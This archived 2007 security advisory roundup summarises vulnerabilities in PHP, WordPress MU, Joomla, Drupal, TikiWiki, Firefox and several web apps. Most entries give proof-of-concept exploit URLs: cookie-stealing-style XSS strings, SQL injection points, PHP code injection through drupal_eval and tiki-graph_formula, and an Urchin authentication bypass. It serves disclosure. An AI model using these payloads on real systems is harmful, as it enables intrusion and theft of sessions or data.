russian-multi.txt

russian-multi.txt: Posted Oct 11, 2007; Site securityvulns.ru; Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.; tags | exploit, php, vulnerability; SHA-256 | fb869b5b3ce55625ab55a47de8fcf2451573a9cbadef41728be9a23809d9f5e8; Download | Favorite | View

russian-multi.txt

Dear bugtraq@securityfocus.com,

  Vulnerabilities  reported  by  different  Russian  speaking authors to
  http://securityvulns.ru

1.  Elekt(Antichat.ru)  reports protection bypass vulnerability in PHP 4
and 5.

disable_functions  feature  can  be bypassed by using functions alias. A
list  of  aliases  is  given  in  http://php.net/aliases/.  For example,
ini_alter() may be used instead of ini_set() and vice versa.

SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original  message (in Russian): http://securityvulns.ru/Sdocument67.html

2.   MustLive   reports  Crossite-Cripting  vulnerability  in  WordPress
MultiUser 1.0

XSS is possible via Username form field.

Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html

3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5

Example:

  http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
  http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

Original message (in Russian): http://securityvulns.ru/Rdocument901.html

4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13

An example of vulnerability is

http://site/index.php?option=com_search&searchword=';alert('XSS')//

Additional information (in Ukranian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html

5.  durito  [NGH  Group]  reports  crossite-scripting  vulnerability  in
ActiveKB NX 2.5.4

Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]

Original message (in Russian): http://securityvulns.ru/Rdocument956.html

6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)

Vulnerability example:

http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();

Original message (in Russian): http://securityvulns.ru/Rdocument957.html

7. MustLive reports cross-site scripting vulnerability in Nucleus.

Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html

8.  durito  [NGH  Group]  reports

   8.1 multiple SQL injections in Stride v1.0 Content Management System,
   Merchant, Courses. Examples:

 Content Management System

  http://www.example.com/main.php?p=[SQL]
  
 Merchant
 
  http://www.example.com/shop.php?cmd=sto&id=[SQL]
  
 Courses
 
  http://www.example.com/detail.php?course=[SQL]
  http://www.example.com/detail.php?provider=[SQL]

  8.2  Information  leak  (FTP access account) with MyFTPUploader within
  same applications. Example:

  http://www.example.com/include/imageupload.js

  contains

  document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
  document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
  document.writeln('<param name="host" value="www.target.com">');
  document.writeln('<param name="userName" value="target">');
  document.writeln('<param name="password" value="target">');

  8.3 Default administrator's password for same applications.

Original message (in Russian): http://securityvulns.ru/Sdocument4.html

9.  MustLive  reports  multiple  crossite  scripting  vulnerabilities in
Site-Up <= 2.64

Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:

Additional information (in Ukranian): http://websecurity.com.ua/1210/
Original message: (in Russian): http://securityvulns.ru/Sdocument12.html

10. MustLive reports crossite scripting in Google Search Appliance.

Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'

Additional information (in Ukranian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html

10. MustLive reports crossite scripting in PRO-search

Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html

10.   MustLive  reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In   addition   to  re-discovered  XSS  vulnerability,  there  is  also
authentication bypass (access without username/password).

Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5

Additional information (in Ukranian): http://websecurity.com.ua/1283/
Original message: (in Russian): http://securityvulns.ru/Sdocument90.html

11. MustLive reports crossite scripting vulnerability in Mozilla Firefox
<=  2.0  with  gopher:  protocol URL if UTF-7 if page content is displayed as
UTF-7. Examples:

For Firefox before 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According  to author, it's possible to execute script in both local zone
and context of gopher site.

12.  ShAnKaR  reports  PHP  Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

Original message (in Russian): http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html










  

-- 
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

russian-multi.txt

russian-multi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

russian-multi.txt

Share This

russian-multi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems